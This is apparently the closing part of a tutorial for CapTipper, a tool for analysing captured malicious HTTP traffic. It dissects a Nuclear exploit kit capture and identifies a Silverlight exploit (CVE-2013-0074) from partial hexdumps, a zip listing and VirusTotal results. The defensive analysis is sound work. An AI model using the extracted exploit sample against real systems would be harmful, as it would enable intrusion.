CT> hexdump 8 Displaying hexdump of object 8 (00015d76.swf) body [256 bytes]: 0000   5A 57 53 17 E4 1B 01 01 4A 7B 00 00 5D 00 00 00    ZWS…..J{..]… 0010   01 00 3B FF FC 8E 19 FA DF E7 66 08 A0 3D 3E 85    ..;…….f..=>. 0020   F5 75 6F D2 74 6B 7F 7F 31 2C 92 04 FD 10 0A EE    .uo.tk..1,…… 0030   E2 C5 C2 C9 4C 83 91 74 AE C8 7C 80 F6 31 A6 CE    ….L..t..|..1.. 0040   C0 15 CB 62 8D 76 42 8B 28 96 D3 83 FE 20 DE 57    …b.vB.(…. .W 0050   7B E4 D2 F1 D8 BC E6 45 CF DC 7B 79 38 41 60 1F    {……E..{y8A`. 0060   0A E9 E4 10 8B F8 DA 0D A6 32 CF E1 E6 E9 78 AB    ………2….x. 0070   8B A7 8A C5 62 8F 0B 31 84 41 10 75 B1 33 35 9D    ….b..1.A.u.35. 0080   6E BA 30 B8 AE EB 78 33 31 67 36 42 01 36 4A A3    n.0…x31g6B.6J. 0090   C8 CB 29 B5 36 6E BF A7 D2 3B 9F 5C 6B A8 4A 9F    ..).6n…;.\k.J. 00A0   A5 59 5F 7F 43 98 39 43 E8 90 69 C7 9D 84 3A 9C    .Y_.C.9C..i…:. 00B0   36 1D E6 12 F8 EB 03 EA F4 59 2A FD 71 9F 15 DB    6……..Y*.q… 00C0   4B F3 C3 C4 4C 70 11 A1 19 25 C8 79 6E 4A 5E 4C    K…Lp…%.ynJ^L 00D0   10 F5 A2 F9 1A E0 18 42 9D 87 9D 39 12 39 57 89    …….B…9.9W. 00E0   CF EF 41 78 2E 57 88 C9 A5 BA F2 0E FC E0 5E B5    ..Ax.W……..^. 00F0   66 0C B4 7E A2 0B C4 D7 65 F8 12 57 98 58 16 16    f..~….e..W.X..

Now let’s take a look at the second one:

CT> hexdump 13 Displaying hexdump of object 13 (00015d76.swf) body [256 bytes]: 0000   50 4B 03 04 14 00 00 08 08 00 81 7A 5D 45 6F 8B    PK………z]Eo. 0010   BE 6C D2 00 00 00 6B 01 00 00 10 00 00 00 41 70    .l….k…….Ap 0020   70 4D 61 6E 69 66 65 73 74 2E 78 61 6D 6C 85 8F    pManifest.xaml.. 0030   C1 4A 03 31 10 86 EF 42 DF 21 E4 01 92 50 6A 95    .J.1…B.!…Pj. 0040   C5 2D 14 F4 2A A5 8A F7 98 9D DA 60 66 12 32 69    .-..*……`f.2i 0050   9B 7D 36 0F 3E 92 AF E0 D6 A2 EC 61 C1 EB 37 FF    .}6.>……a..7. 0060   C7 C7 7C 7D 7C DE DD 43 0A B1 47 A0 22 2A 06 E2    ..|}|..C..G.”*.. 0070   56 EE 4B 49 8D D6 EC F6 80 96 15 7A 97 23 C7 5D    V.KI…….z.#.] 0080   51 2E A2 76 C1 0F 53 3D 37 E6 46 77 7F AA BC B8    Q..v..S=7.Fw…. 0090   4D FD C7 3E 79 DA D5 B3 BC D4 D5 62 90 E2 81 4A    M..>y……b…J 00A0   EE 37 D1 53 59 33 03 BE 86 BE 95 15 F2 D1 A2 25    .7.SY3………% 00B0   48 B0 00 7A F7 E3 D5 73 9F A0 95 96 BB 37 EE D4    H..z…s…..7.. 00C0   3A 25 29 B6 07 2A 1E E1 05 32 FB 48 AD 5C 28 A3    :%)..*…2.H.\(. 00D0   AE CD ED 7C A9 8C 5C CD AE 84 18 7D A8 36 36 17    …|..\….}.66. 00E0   FE A1 03 FF 2D 9E A1 A8 CD A3 45 98 8A 3F C5 43    ….-…..E..?.C 00F0   76 13 17 D5 85 E1 01 7D 69 E8 89 C8 18 AE BE 01    v……}i…….

Interesting… This file starts with the ‘PK‘ magic bytes, meaning it’s actually a zip file, which can be a few things.

Let’s take a look at the files inside the zip using the command ‘ziplist‘

CT> ziplist 13  2 Files found in zip object 13 (00015d76.swf):  [Z] 1 : AppManifest.xaml  [Z] 2 : xervamanepe4enki.dll

Well it seems that this is actually a Silverlight exploit.
Now we can dump it with it’s real extension:

CT> dump 13 c:\NuclearFiles\Silver_exp.xap  Object 13 written to c:\NuclearFiles\Silver_exp.xap

We can also send the file’s md5 hash to VirusTotal to see if it is recognized by any of the Anti-Virus providers, using the command ‘vt‘.
These requires a VirusTotal public API key.
(The file itself isn’t sent to VT, only the hash of the file is sent!)

CT> vt 13  VirusTotal result for object 13 (00015d76.swf):  Detection: 37/56  Last Analysis Date: 2014-12-11 13:15:33  Report Link: https://www.virustotal.com/file/5bcb20f506ce854eb3191ca87a14c5777cdcb0f96ffec0b6…  Scan Result:         MicroWorld-eScan        Trojan.GenericKD.1962112        12.0.250.0      20141211         nProtect        Trojan.GenericKD.1962112        2014-12-11.01   20141211         CAT-QuickHeal   Trojan.Generic.r3       14.00   20141210         McAfee  RDN/Generic Exploit!1ns 6.0.5.614       20141211         Malwarebytes    Trojan.Agent    1.75.0.1        20141211         VIPRE   Trojan.Win32.Generic!BT 35624   20141211         K7AntiVirus     Exploit ( 004b06661 )   9.186.14309     20141211         K7GW    Exploit ( 004b06661 )   9.186.14308     20141211         Agnitum Exploit.CVE-2013-0074!  5.5.1.3 20141210         F-Prot  W32/CVE130074.I 4.7.1.166       20141211         Symantec        Trojan.Gen.2    20141.1.0.330   20141211         Norman  CVE-2013-0074.D 7.04.04 20141211         TotalDefense    Win32/Tnega.DPSQOR      37.0.11324      20141211         TrendMicro-HouseCall    Suspicious_GEN.F47V1112 9.700.0.1001    20141211         Avast   Win32:Malware-gen       8.0.1489.320    20141211         ClamAV  SILVERLIGHT.Exploit.Nuclear     0.98.5.0        20141211         BitDefender     Trojan.GenericKD.1962112        7.2     20141211         NANO-Antivirus  Exploit.Win32.CVE20130074.dikfyh        0.28.6.63850    20141211         Ad-Aware        Trojan.GenericKD.1962112        12.0.163.0      20141211         Sophos  Mal/Generic-S   4.98.0  20141211         Comodo  UnclassifiedMalware     20333   20141211         F-Secure        Trojan.GenericKD.1962112        11.0.19100.45   20141211         DrWeb   Exploit.CVE2013-0074.36 7.0.10.8210     20141211         McAfee-GW-Edition       RDN/Generic Exploit!1ns v2014.2 20141211         Emsisoft        Trojan.GenericKD.1962112 (B)    3.0.0.600       20141211         Cyren   W32/CVE130074.MCZQ-2806 5.4.1.7 20141211         Avira   EXP/Silverlight.Gen2    7.11.194.74     20141211         Antiy-AVL       Trojan/Win32.SGeneric   1.0.0.1 20141211         Microsoft       Exploit:MSIL/CVE-2013-0074.F    1.11202 20141211         GData   Trojan.GenericKD.1962112        24      20141211         ALYac   Exploit.CVE-2013-0074   1.0.1.4 20141211         AVware  Trojan.Win32.Generic!BT 1.5.0.21        20141211         Panda   Exploit/CVE-2013-0074   4.6.4.2 20141211         ESET-NOD32      a variant of Win32/Exploit.CVE-2013-0074.BZ     10861   20141211         Ikarus  Exploit.CVE-2013-0074   T3.1.8.5.0      20141211         AVG     Exploit_c.ABKR  15.0.0.4235     20141211         Baidu-International     Trojan.Win32.CVE-2013-0074.bBZ  3.5.1.41473     20141211

We notice that most of the Anti-Viruses detected this file as malicious, while some even provided the exploit CVE (2013-0074)

• If you don’t have a VirusTotal public API key, you can use the command ‘hashes‘, and manually send the hash to VirusTotal.

Info

---

CapTipper was written by Omri Herscovici
Twitter: @omriher

Please open an issue for bugs.
I would be happy to accept suggestions and feedback to my mail 🙂

To do (Added among other things to CapTipper v0.2):

• File Identification
• Regex Search
• PE info

omriher@gmail.com

CapTipper can be found at GitHub: https://github.com/omriher/CapTipper